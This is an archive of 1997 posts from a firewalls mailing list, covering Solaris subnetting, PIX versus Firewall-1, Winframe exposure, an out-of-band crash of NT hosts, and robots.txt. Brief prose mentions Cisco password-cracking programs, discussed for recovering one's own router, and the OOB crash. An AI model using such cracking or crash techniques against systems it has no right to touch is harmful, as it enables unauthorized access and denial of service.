~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > Comments: Internet Message: Sender identity is not verified. > Comments: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > Content-Transfer-Encoding: 8bit > Mime-Version: 1.0 > Date: Wed, 04 Jun 1997 09:32:25 -0400 (EDT) > From: Ken Kempster > To: "Amy (Cremer) Briggs" > Subject: RE: Solaris > Cc: uunet!GreatCircle.COM!firewalls > > > On 03-Jun-97 "Amy (Cremer) Briggs" wrote: > >First of all if there is a better list to post this to please let me know. > >I've checked out Suns web site and didn't find any mention of a Solaris > >listserv. > > > >Does anyone know how can you trick a Solaris box into > >treating a class C address as a class B. For example we want to use > >2xx.xx.0.0 as a class B address. I've entered the class B subnetmask for > > It is possible to turn a class C into a class B but you do it by > using non-standard subnet masking; you can't use the standard class B > subnet mask. > > There is a way to calculate the subnet mask based on the range > of IP's you will be using within the class C address when you break it up. > > A book detailing the functionality of the IP stack should have in detail > how to do this. > > > > > >this network in the /etc/netmasks file which is how I thought you could do it > >but it isn't working for me. It still thinks its a class C address and won't > >route properly if I set up my routes using it as a class B address. > >Finding a way to make this work would save me hours of time because I > >have 5 full class B(Technically class C) networks to do this for and > >entering all the class C's within all 5 class B's would take me awhile as > >well as complicate my routing table. > > > >Thanks for any help or information you can give me. > > > >Amy > > > > \\\\\\\\\\\\\\Amy Briggs Microcomputer Support Specialist/////////////// > > Library of Michigan amyc@libofmich.lib.mi.us > >\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\//////////////////////////////////////////// > > ** Its not what you've got, its what you give--TESLA ** > > > > > > > > > > > > > > > > > > > > |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| > | Ken Kempster kempster@monarch.rnb.com | > | Network Systems Engineer _\|/_ | > | Republic National Bank (o o) | > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~oOO-(_)-OOo~~~~~~~~~~~~~~ Andrew Luca Fidelity Investments 82 Devonshire Street F2D Boston, MA 02109 From owner-firewalls-outgoing Fri Jun 6 07:26:54 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA28295 for firewalls-outgoing; Fri, 6 Jun 1997 06:15:30 -0700 (PDT) Received: from onshore.com (onShore.com [206.69.88.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA28103 for ; Fri, 6 Jun 1997 06:14:40 -0700 (PDT) Received: (from craig@localhost) by onshore.com (8.8.5/8.7.3) id IAA24817; Fri, 6 Jun 1997 08:18:48 -0500 Date: Fri, 6 Jun 1997 08:18:47 -0500 From: Craig Brozefsky Subject: RE: PIX and Firewall-1 To: Eric Vyncke cc: firewalls@GreatCircle.COM In-Reply-To: <3.0.32.19970606094942.006e0a64@brussels.cisco.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 6 Jun 1997, Eric Vyncke wrote: > Craig, > > Cannot resist to reply :-) Beware that I'm working for Cisco Systems ;-) Is cool. > I both agree and disagree: > > 1) NAT is NOT a security feature, I agree thus 200% with you > > - PIX is very strong due to its fullstate inspection against > attacks for IP, TCP, ... protocols: SYN flooding, IP spoofing, > TCP/IP session hijakcing, ... It also randomized the TCP sequence > numbers of the TCP sessions going through it I do not agree that 'fullstate inspection' makes PIX 'very strong'. See previous thread. I'm reluctant to start yet another SMLI vs. App Proxy showdown. > - PIX knows about the internal of some protocols (from ICMP, to RealAudio > via HTTP) and is able to check / react on these protocols Can I write filters for PIX that will be aware of the internals of protocols? Or do I have ot wait for Cisco to write them? Craig Brozefsky craig@onshore.com onShore Inc. http://www.onshore.com/~craig Development Team p_priority=PFUN+(p_work/4)+(2*p_cash) From owner-firewalls-outgoing Fri Jun 6 07:40:26 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA19902 for firewalls-outgoing; Fri, 6 Jun 1997 05:27:21 -0700 (PDT) Received: from ozemail.com.au (server3.syd.mail.ozemail.net [203.108.7.41]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id FAA19864 for ; Fri, 6 Jun 1997 05:27:09 -0700 (PDT) Received: from oznet11.ozemail.com.au (oznet11.ozemail.com.au [203.2.192.118]) by ozemail.com.au (8.8.4/8.6.12) with ESMTP id WAA29438; Fri, 6 Jun 1997 22:31:03 +1000 (EST) Received: from slcan5p58.ozemail.com.au (slcan5p58.ozemail.com.au [203.108.193.74]) by oznet11.ozemail.com.au (8.8.4/8.6.12) with SMTP id WAA25232; Fri, 6 Jun 1997 22:31:00 +1000 (EST) Received: by slcan5p58.ozemail.com.au with Microsoft Mail id <01BC72C9.601A2390@slcan5p58.ozemail.com.au>; Fri, 6 Jun 1997 22:31:28 +1000 Message-ID: <01BC72C9.601A2390@slcan5p58.ozemail.com.au> From: Consultancy Group To: "'Eric Vyncke'" , "Jonathan M. Bresler" , Cy Ardoin Cc: "Firewalls@GreatCircle.COM" Subject: RE: PIX and FW-1 (packet filter Question) Date: Fri, 6 Jun 1997 22:31:06 +1000 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk -----Original Message----- From: Eric Vyncke [SMTP:evyncke@cisco.com] Sent: Friday, June 06, 1997 7:55 PM To: Jonathan M. Bresler; Cy Ardoin Cc: Firewalls@GreatCircle.COM Subject: Re: PIX and FW-1 (packet filter Question)=20 At 13:18 5/06/97 -0400, Jonathan M. Bresler wrote: > >>I don't think there is anything an application firewall can >>do that can't also be done by a "packet filter" firewall. The > > trivial example: > a smtp application level proxy can disable the "debug" command >for every sendmail behind that firewall. This kind of stuff is also done in some full-state inspection firewalls :-) What about the sort of 'potential' nasties such as Java and Active-X? = Also stripping of sendmail clever options via SMAP! The default security = policy of a strong firewall is to deny anything not specifically allowed = - if you cannot filter at the application level then you cannot control = options such as these. My (paranoid) philosophy is that if you don't expect or understand = anything in the comms or application protocol, then bar it from = transcending the firewall pending a half-decent business or technical = case to allow it through. > >>new packet filter firewalls are not like the old Cisco/Bay router >>filters. The new systems operate at the network layer, but they >>have knowledge of the protocols and applications. They >>open up the packets and modify the data. These systems are >>doing content filtering and other "application" types of operations. >>Yes, not all of them do these things, but many do, and new >>feature/functions are being added to these systems every year. > >jmb > > >--=20 >Jonathan M. Bresler 202-452-2831 = breslerj@frb.gov >MS-169 Federal Reserve Board of Governors Washington DC = 20551 >Speaking for myself. Others speak for the Federal Reserve Board of = Governors > > Eric Vyncke =20 Technical Consultant Cisco Systems Belgium SA/NV Phone: +32-2-778.4677 Fax: +32-2-778.4300 E-mail: evyncke@cisco.com Mobile: +32-75-312.458 From owner-firewalls-outgoing Fri Jun 6 08:21:06 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA22521 for firewalls-outgoing; Fri, 6 Jun 1997 05:42:19 -0700 (PDT) Received: from datacommcorp.com ([206.152.253.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id FAA22456 for ; Fri, 6 Jun 1997 05:41:57 -0700 (PDT) Message-Id: <199706061241.FAA22456@honor.greatcircle.com> Received: from [199.34.57.89] by datacommcorp.com (SMTPD32-95.10.15) id A7582630094; Fri Jun 06 08:49:28 1997 From: "Steve Rudolph" To: "Ryan Russell/SYBASE" Cc: "firewalls" Subject: Re: FW-1 and IP Forwarding on NT Box Date: Fri, 6 Jun 1997 08:49:17 -0400 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1161 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ryan and group, > Retrieving and/or resetting the Cisco password is fairly > trivial if there is a console port on that card.. haven't used the > card version, but I've done it on real 2500's many times. > Search the Cisco web site for "password recovery." Yes this works if the console port is an external port and it does not run through the PC bus like the AccessPro 2500 PC Card. It does have an AUX port, but it will not let me send a break signal. I have tried 3 or so termainal programs. > If they've turned on password encryption, you can either change > the password, or do a web search for Cisco password crackers, > I've seen a couple. Haven't tried those. I found one pretty easy (hack c program for cisco password). Thanks. I'll let you know. Steve Rudoph http://www.datacommcorp.com srudolph@datacommcorp.com http://www.rude-dog.com http://www.rust.net/~stever stever@rust.net > ---------- Previous Message ---------- > To: david, firewalls > cc: > From: srudolph @ datacommcorp.com ("Steve Rudolph") @ smtp > Date: 06/05/97 08:26:39 AM > Subject: Re: FW-1 and IP Forwarding on NT Box > > David and group.... > > I have already got this running. Thank you to all who responed to my > inquiry. I have learned alot just from the replys. I left my brain in the > shower that day..... I forgot to set the Default Gateway on EACH machine > on both networks to the NIC in the router on that machines network. > > Now I just need to krak the router password for a Cisco AccessPro 2500 PC > card. This piece of equipment came in a firewall disguise call MCI > Webmaker. This was a combination Port filter router and proxy server. As > it turns out Intel programed the software (proxy), and configured the > router. Vanstar installed the os (NT), and none of the above are able to > get me the router password. Right now my DNS is being partially blocked > because of this (I know very little about DNS, any good books? I am using > MS DNS-OK for now (:o) ). I contacted Cisco and the only way to break the > password is to send a break to the com port (remember it is a pc card) in > terminal mode within 60 seconds. And then begin the recovery sequence. > Kind of hard to do with NT or 95. I can't seem to find a copy of Dos 5.0 > or an old hard drive anywhere with a dos based terminal program. Ths > whole situation is messed. My employer wants to wait to use the router and > not buy a new one. It is holding up US$40K in billing though. Can anyone > help, or if you have a similar problem let me know and I will get you the > correct person to call. > > Thanks again > > Steve Rudoph > http://www.datacommcorp.com > srudolph@datacommcorp.com > > http://www.rude-dog.com > http://www.rust.net/~stever > stever@rust.net > > ---------- > > From: David Harvey-George > > To: Steve Rudolph ; firewalls@greatcircle.com > > Subject: Re: FW-1 and IP Forwarding on NT Box > > Date: Wednesday, June 04, 1997 7:14 PM > > > > > > > I followed all of microsoft's reccomendations. > > > > Possibly a bad move. > > > > > Two nic cards a and b > > > > Sounds like the start of a stand-up comedy routine > > > > > > > > A is set with default gateway of b > > > and b is set with gateway of a > > > > it is! > > > > Okay, look, the system with the two cards knows how to route to each > > network. All you've gotta do is set up the default gateway for > > workstations on network A (NIC A) and the default gateway for > workstations > > on network B (NIC B). Don't touch anything on the router if your network > > really is this simple (e.g. no other routes). If you have other routes > > then use the route command directly. > > > > > Workstations can ping a and b > > > Workstations cannot ping network b > > > Ip forwarding is enabled and my route print matches exactly the format > of > > > microsofts reccomendations. > > > > > > I really need to get this up and running. I would get you the route > > print, > > > but I cannot get the addresses to copy onto the clip board..duh :) > > > > Yeah, I think you better send us the output from netstat on both the > > 'router' and the workstations. > > > > Run netstat -rn from a DoZ window, click on the little Doz icon at the > left > > of the title bar, select edit/mark, mark the stuff you want to send, copy > > it and paste it. > > > > David > > > > From owner-firewalls-outgoing Fri Jun 6 08:31:15 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA06061 for firewalls-outgoing; Fri, 6 Jun 1997 06:51:37 -0700 (PDT) Received: from commons.cmold.com (commons.cmold.com [204.255.183.49]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id GAA05963 for ; Fri, 6 Jun 1997 06:51:05 -0700 (PDT) Received: (from Uactech@localhost) by commons.cmold.com (8.6.12/8.6.12) with UUCP id JAA24212 for firewalls@GreatCircle.COM; Fri, 6 Jun 1997 09:59:46 -0400 Received: from ovid.actech.com (ovid [198.41.4.14]) by spencer.actech.com (8.7.1/8.7.1) with ESMTP id JAA12225 for ; Fri, 6 Jun 1997 09:47:01 -0400 (EDT) Received: (from gaarder@localhost) by ovid.actech.com (8.7.1/8.7.1) id JAA23143; Fri, 6 Jun 1997 09:47:02 -0400 (EDT) Date: Fri, 6 Jun 1997 09:47:02 -0400 (EDT) Message-Id: <199706061347.JAA23143@ovid.actech.com> From: Steve Gaarder To: firewalls@GreatCircle.COM Subject: Does Winframe need a firewall? In-Reply-To: <3.0.1.16.19970605220043.356f0950@mail-hub> References: <3.0.1.16.19970605220043.356f0950@mail-hub> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ken Gunther writes: > Is Winframe safe to put directly on the untrusted network? We are worried > about unauthorized people getting through to the trusted side as well as > denial of service attacks where people try to crash Winframe. > Ken (kgunther@nassau.cv.net) I'd treat it like any other NT box, which is to say that *I* wouldn't put it directly on an untrusted net. If all you want to do is provide Winframe, one approach would be to put a second ethenet card in the machine and connect it to the untrusted network through a filtering router, letting only the ICA port through. Steven Gaarder Network and Systems Administrator gaarder@cmold.com C-MOLD, Ithaca, N.Y., USA From owner-firewalls-outgoing Fri Jun 6 08:51:59 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA24724 for firewalls-outgoing; Fri, 6 Jun 1997 08:40:37 -0700 (PDT) Received: from shrike.depaul.edu (shrike.depaul.edu [140.192.1.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA24660 for ; Fri, 6 Jun 1997 08:40:17 -0700 (PDT) Received: from localhost (kfrisco@localhost) by shrike.depaul.edu (8.8.3/8.5) with SMTP id KAA18621; Fri, 6 Jun 1997 10:35:26 -0500 (CDT) Date: Fri, 6 Jun 1997 10:35:22 -0500 (CDT) From: "k. frisco" To: firewalls@greatcircle.com Subject: nt web server log Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Withh all the talk about hacking webservers, I was wondering if anyone knows anything about a weird log msg that we got on our nt webserver? it was a get to robots.txt There is no file or image that is related to this file name on our web page. Could not even find it on the server anywhere. Am I unduly concerned? From owner-firewalls-outgoing Fri Jun 6 09:03:17 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA05532 for firewalls-outgoing; Fri, 6 Jun 1997 06:49:10 -0700 (PDT) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA05257 for ; Fri, 6 Jun 1997 06:48:05 -0700 (PDT) Received: (adam@localhost) by homeport.org (8.8.5/8.6.9) id JAA12541; Fri, 6 Jun 1997 09:50:05 -0400 (EDT) From: Adam Shostack Message-Id: <199706061350.JAA12541@homeport.org> Subject: Re: Does Winframe need a firewall? In-Reply-To: <3.0.1.16.19970605220043.356f0950@mail-hub> from Ken Gunther at "Jun 5, 97 10:00:43 pm" To: kgunther@nassau.cv.net (Ken Gunther) Date: Fri, 6 Jun 1997 09:50:05 -0400 (EDT) Cc: firewalls@GreatCircle.COM X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If I get an account on IGN, what prevents me from attacking your Winframe box? Do you trust Citrix to have gotten all their security right? What can I gain once I've broken it? (Hints; does it strongly* encrypt passwords as they go over the net? Does it resist password guessing attacks? Session hijacking?) *For explanations of strong encryption, see the Snake Oil Crypto FAQ. http://www.research.megasoft.com/people/cmcurtin/snake-oil-faq.html Adam Ken Gunther wrote: | We are currently using Winframe by Citrix to give remote users access to | applications at our datacenter. Access to the Winframe box is through the | IBM Global Network (IGN). IGN is a subscribers only network. It is not as | open as the Internet but by no means do we have control over who is on it. | | We currently have a firewall in front of the Winframe box but there is a | noticable delay in keystrokes when going through the firewall (TIS Toolkit | on a Linux box). We have performed some tests where for short periods of | time the Winframe box was connected directly to the IGN and the keystroke | delays went away. | | Is Winframe safe to put directly on the untrusted network? We are worried | about unauthorized people getting through to the trusted side as well as | denial of service attacks where people try to crash Winframe. -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-firewalls-outgoing Fri Jun 6 09:26:54 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA05234 for firewalls-outgoing; Fri, 6 Jun 1997 06:47:51 -0700 (PDT) Received: from checkov.twc.com (securit.twc.com [206.114.124.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA05153 for ; Fri, 6 Jun 1997 06:47:32 -0700 (PDT) Received: by checkov.twc.com with Internet Mail Service (5.0.1457.3) id ; Fri, 6 Jun 1997 08:49:32 -0500 Message-ID: <97431B954A9AD0119CCC00609733C45506796A@checkov.twc.com> From: "Jim E. Crawford" To: "'rabbi@www.valuu.net'" , "'firewalls@GreatCircle.COM'" Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts Date: Fri, 6 Jun 1997 08:49:30 -0500 X-Priority: 3 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.0.1457.3) Content-Type: text/plain; charset="iso-8859-1" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Yes, but Checkpoint (Firewall-1) recommends only SP1....and I myself have experienced problems trying to run it with SP3. Firewall-1 (inspection module)resides between the Network and datalink layers anyway....so you can block it with the firewall before the OS even sees it. Jim Crawford Paranet Technical Analyst -----Original Message----- From: rabbi@www.valuu.net [SMTP:rabbi@www.valuu.net] Sent: Thursday, June 05, 1997 10:13 PM To: 'firewalls@GreatCircle.COM' Subject: FW: [FW1] Out of Band Data Attack against NT-Hosts Microsoft has a fix for OOB which can only be applied after SP3 for NT4 Both SP3 and the OOB Fix are available at their FTP site. Shalom Rabbi ---------- From: Pete Vickers[SMTP:pvickers@adtranz-signal.co.uk] Sent: Thursday, June 05, 1997 2:05 PM To: Jyri Kaljundi; 'Bryan D. Boyle' Cc: firewalls@GreatCircle.COM Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts i was under the impression that since FW-1 only supported serveral net i/f cards that they rewrote the drivers for these, and thus managing to get between the OS and the card h/w. [pls correct me if i'm wrong, this was only an assumption !] Pete ---------- From: Bryan D. Boyle Sent: 05 June 1997 13:46 To: Jyri Kaljundi Cc: firewalls@GreatCircle.COM Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts At 03:08 PM 6/5/97 +0300, you wrote: >You mean you can crash and NT FW-1 by sending OOB data to it?! >That's scary if it is true and should be addressed by Check Point ASAP! > It is a bogosity with NT and not with FW1. Can't be addressed by Checkpoint, since the OS is not in their control. They can only operate (or be as secure as) at the least common denominator level of the underlying OS. >What I have always thought of FW-1 is that it operates at quite low level >inside the OS kernel, that as long as you filter everything the network >bugs in the OS don't really matter, as the packets never reach FW-1. Nothing except MS code operates in the NT kernel. This problem is with what happens when you send oob data to a stack (MS) that is tightly integrated with the OS (FW1 runs on top of this stuff, not in it...) and the stack/OS interface and control mechanism itself is crap. Of course, on UN*X systems, this is not the case. This is a signal example of the difference between designing for peer review of your security model and designing for what gets good trade publication reviews. > >If sending some bytes of data to FW1 crashes it and the OS, this >combination (FW1+NT) should not be used as a firewall solution at all. May >be someone from CP could explain, how much do the bugs in the OS matter >once FW1 is installed. If there is an overall architectural problem with NT as it is, then the OS bugs matter A LOT. But, of course, those that say you can trust a black box solution since the vendors are trustworthy are quite quiet on this regard... I would agree that you should ignore NT as an OS platform in a security solution right now. Just my opinion, $.02 US, etc. Flames to /dev/null. -- Bryan D. Boyle | LOGICAL: bdboyle@att.com 201-386-8584 #include | VIRTUAL: http://www.access.digex.net/~bdboyle AT&T Laboratories, Inc. | PHYSICAL: Whippany, NJ | HISTORICAL: HQ, 6th Battalion, Army of No. VA. "What country can preserve its liberties, if its rulers are not warned from time to time, that its people preserve the spirit of resistance?" -Thomas Jefferson, 1787 From owner-firewalls-outgoing Fri Jun 6 09:58:51 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id WAA28238 for firewalls-outgoing; Thu, 5 Jun 1997 22:25:35 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id WAA28065 for ; Thu, 5 Jun 1997 22:24:51 -0700 (PDT) Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id WAA24793 for ; Thu, 5 Jun 1997 22:32:18 -0700 (PDT) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA02988; Thu, 5 Jun 97 22:30:37 PDT Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id WAA15413 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Thu, 5 Jun 1997 22:29:31 -0700 (PDT) Message-Id: <199706060529.WAA15413@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id 2BFD8BBA39F3FB9D882564AE001E2857; Thu, 5 Jun 97 22:29:27 EDT To: "Conrad Minor" Cc: "Jyri Kaljundi" , "Bryan D. Boyle" , firewalls From: Ryan Russell/SYBASE Date: 5 Jun 97 22:35:51 EDT Subject: Re: [FW1] Out of Band Data Attack against NT-Hosts X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If I may interject in this conversation for a moment... Firewall-1 (and, understand I'm used to FW1 on solaris) gets first crack at the packets, decides if they meet whatever criteria, and then passes them on to the IP stack that comes with the OS. It doesn't replace the stack per se, it still relies on the native OS IP driver to route packets and such, but hooks the OS such that the FW1 kernel gets to look at the packet first. On my firewall-1 machine, I've got the rules set so that no one is allowed to connect to the firewall machine, i.e. drop all packets with a destination address of the firewall itself. Now, it looks like the NT box in question did not have such a rule, so port 139 was "exposed." There may have been a reason for this, or it may have been oversight, or it may be a limitation of the FW1 implementation on NT, I don't know. I do, however, think it's an extraordinarily bad idea. Ryan ---------- Previous Message ---------- To: jk, bdboyle cc: firewalls From: minorc @ reston.ans.net ("Conrad Minor") @ smtp Date: 06/05/97 01:39:32 PM Subject: Re: [FW1] Out of Band Data Attack against NT-Hosts All, This of course doesn't address the problem with the FW1. It is just to refute the notion that NT is a completely closed OS. Any firewall worth it's salt won't be running the native NT stack unmodified. How for example would you plumb something like stateful inspection onto an NT box without kernel changes? There are several methods of modifying the stack to harden it against attack or change the way it operates. The first would be to shim the stack ie putting a driver between the Ethernet card drivers and the stack itself. NT has built in support for this. Just read the DDK documentation. NT 4.0 has even better support then 3.51 since Msoft has added calls that let you dynamically hook into the NDIS stuff. This is in fact that's how RAS is implemented (NDISWAN). Another option of course is to replace the TCP stack all together. Centri from Global Internet does that. Check out their web page. They completely bypass the microsoft stack by building their own proprietory stack which intercepts all packets coming to the firewall. They optionally will pass packets to the Msoft stack depending on how your rules are configured. Packet filter firewalls don't even need a TCP stack. Just hooks into the NDIS routines that handle the reception and distribution of packets. Probably could do this with another SHIM. All of this is documented by Microsoft, The source code for sample drivers are available as part of the DDK. While there are no sample SHIM drivers, a buddy and I created one for NT3.51 in about a month. It was really a matter of combining an existing ethernet driver with an existing protocol driver and making them talk to each other. NT even has source level debugging at the kernel layer. Name some UNIX boxes that support that (not to suggest that one is better then the other, just that NT kernel work is easier. Streams are pretty damn elegant). Conrad ---------- > From: Bryan D. Boyle > To: Jyri Kaljundi > Cc: firewalls@greatcircle.com > Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts > Date: Thursday, June 05, 1997 9:46 AM > > At 03:08 PM 6/5/97 +0300, you wrote: > > >You mean you can crash and NT FW-1 by sending OOB data to it?! > >That's scary if it is true and should be addressed by Check Point ASAP! > > > > It is a bogosity with NT and not with FW1. Can't be addressed by Checkpoint, > since the OS is not in their control. They can only operate (or be as > secure as) at the least common denominator level of the underlying OS. > > >What I have always thought of FW-1 is that it operates at quite low level > >inside the OS kernel, that as long as you filter everything the network > >bugs in the OS don't really matter, as the packets never reach FW-1. > > Nothing except MS code operates in the NT kernel. This problem is with > what happens when you send oob data to a stack (MS) that is tightly integrated > with the OS (FW1 runs on top of this stuff, not in it...) and the stack/OS > interface and control mechanism itself is crap. > > Of course, on UN*X systems, this is not the case. This is a signal example > of the difference between designing for peer review of your security model > and designing for what gets good trade publication reviews. > > > > >If sending some bytes of data to FW1 crashes it and the OS, this > >combination (FW1+NT) should not be used as a firewall solution at all. May > >be someone from CP could explain, how much do the bugs in the OS matter > >once FW1 is installed. > > If there is an overall architectural problem with NT as it is, then the OS > bugs matter A LOT. But, of course, those that say you can trust a black box > solution since the vendors are trustworthy are quite quiet on this regard... > > I would agree that you should ignore NT as an OS platform in a > security solution right now. Just my opinion, $.02 US, etc. > > Flames to /dev/null. > -- > Bryan D. Boyle | LOGICAL: bdboyle@att.com 201-386-8584 > #include | VIRTUAL: http://www.access.digex.net/~bdboyle > AT&T Laboratories, Inc. | PHYSICAL: Whippany, NJ > | HISTORICAL: HQ, 6th Battalion, Army of No. VA. > "What country can preserve its liberties, if its rulers are not warned > from time to time, that its people preserve the spirit of resistance?" > -Thomas Jefferson, 1787 From owner-firewalls-outgoing Fri Jun 6 10:25:02 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA28413 for firewalls-outgoing; Fri, 6 Jun 1997 09:02:07 -0700 (PDT) Received: from paranoid.convey.ru (ws05.convey.ru [195.182.128.20]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA28348 for ; Fri, 6 Jun 1997 09:01:47 -0700 (PDT) Received: (from ark@localhost) by paranoid.convey.ru (8.7.5/8.7.3) id UAA04862; Fri, 6 Jun 1997 20:05:12 +0400 From: ArkanoiD Message-Id: <199706061605.UAA04862@paranoid.convey.ru> Subject: Re: Secure Telnet! To: snajdr@pvt.net (Petr Snajdr) Date: Fri, 6 Jun 1997 20:05:06 +0400 (MSD) Cc: vin@shore.net, firewalls@GreatCircle.COM In-Reply-To: <33967557.62C80DFD@pvt.net> from "Petr Snajdr" at Jun 5, 97 10:14:15 am X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk nuqneH, > There are 2 snapshot: > > ftp://hotline.pvt.net/pub/win_utils/winsock/ssh/ssh.gif So it does not support TIS authentication? -- _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! From owner-firewalls-outgoing Fri Jun 6 10:31:22 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA29329 for firewalls-outgoing; Fri, 6 Jun 1997 09:07:22 -0700 (PDT) Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id JAA29291 for ; Fri, 6 Jun 1997 09:07:09 -0700 (PDT) Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id LAA05437; Fri, 6 Jun 1997 11:01:56 -0500 Received: from dns1srv.bridge.com(167.76.36.6) by gatekeeper.Bridge.COM via smap (V1.3) id sma005394; Fri Jun 6 11:01:41 1997 Received: from binki.bridge.com (binki.bridge.com [167.76.24.243]) by dns1srv.bridge.com (8.7.6/8.7.3) with ESMTP id LAA20569; Fri, 6 Jun 1997 11:05:57 -0500 (CDT) Received: (from ken@localhost) by binki.bridge.com (8.7/8.7) id LAA14579; Fri, 6 Jun 1997 11:06:29 -0500 (CDT) Date: Fri, 6 Jun 1997 11:06:29 -0500 (CDT) From: Ken Hardy Message-Id: <199706061606.LAA14579@binki.bridge.com> To: kfrisco@shrike.depaul.edu Subject: Re: nt web server log Cc: firewalls@greatcircle.com X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk See http://info.webcrawler.com/mak/projects/robots/norobots.html ----- Begin Included Message ----- Date: Fri, 6 Jun 1997 10:35:22 -0500 (CDT) From: "k. frisco" To: firewalls@GreatCircle.COM Subject: nt web server log Withh all the talk about hacking webservers, I was wondering if anyone knows anything about a weird log msg that we got on our nt webserver? it was a get to robots.txt There is no file or image that is related to this file name on our web page. Could not even find it on the server anywhere. Am I unduly concerned? ----- End Included Message ----- From owner-firewalls-outgoing Fri Jun 6 10:43:17 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA02842 for firewalls-outgoing; Fri, 6 Jun 1997 09:28:21 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA01362 for ; Fri, 6 Jun 1997 09:18:12 -0700 (PDT) Received: from services.state.mo.us (services.state.mo.us [168.166.2.67]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with ESMTP id JAA05218 for ; Fri, 6 Jun 1997 09:23:52 -0700 (PDT) Received: from services (services [168.166.2.67]) by services.state.mo.us (8.8.3/8.8.0) with SMTP id LAA05941; Fri, 6 Jun 1997 11:21:19 -0500 (CDT) Date: Fri, 6 Jun 1997 11:21:19 -0500 (CDT) From: James Proffer X-Sender: james@services To: "k. frisco" cc: firewalls@GreatCircle.COM Subject: Re: nt web server log In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The file robots.txt holds any robot exclusion rules you might care to write for your web server. Most (but not all) web spiders look for /robots.txt and obey its exclusions. On Fri, 6 Jun 1997, k. frisco wrote: > Withh all the talk about hacking webservers, I was wondering if anyone > 